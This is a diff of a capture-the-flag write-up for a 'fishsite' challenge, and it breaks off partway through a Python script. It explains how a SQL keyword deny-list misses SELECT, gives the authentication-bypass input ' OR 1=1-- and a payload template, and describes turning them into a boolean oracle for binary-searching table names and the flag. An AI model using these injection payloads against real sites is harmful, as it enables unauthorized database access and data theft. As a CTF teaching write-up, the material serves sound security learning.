Karmaticow/ctf/write-ups/fishsite/index.md

 We can see in ``fishsite.py`` that there is a list of disallowed words that we cannot use in our SQL injection:
 ``DISALLOWED_WORDS = ["insert", "create", "alter", "drop", "delete", "backup", "transaction", "commit", "rollback", "replace", "update", "pragma", "attach", "load", "vacuum"]``

 Notably, this list does not disallow "SELECT."

-This means we can binary search for table/column names.
-In this case, the flag was in... "flag."
+Remember this input from earlier that gave us access to the administration pane?
+``' OR 1=1--``

-We can again utilize binary search to recover the full flag.
+We can use this kind of query for binary search by just replacing 1=1 with a boolean we want to check.

-Solve code: (this is after binary searching for table names and finding "flag")
+In this case, we can binary search for characters in the list of tables, then the list of columns.

+Recon code:
 ```
 import requests

-url = "https://fishsite-a32d72b4635a88d5.challenges.2025.vuwctf.com"  # replace with your url
+url = "https://fishsite-a32d72b4635a88d5.challenges.2025.vuwctf.com/"  # replace with your instance url

 def check(condition):
     payload = f"' OR ({condition})--"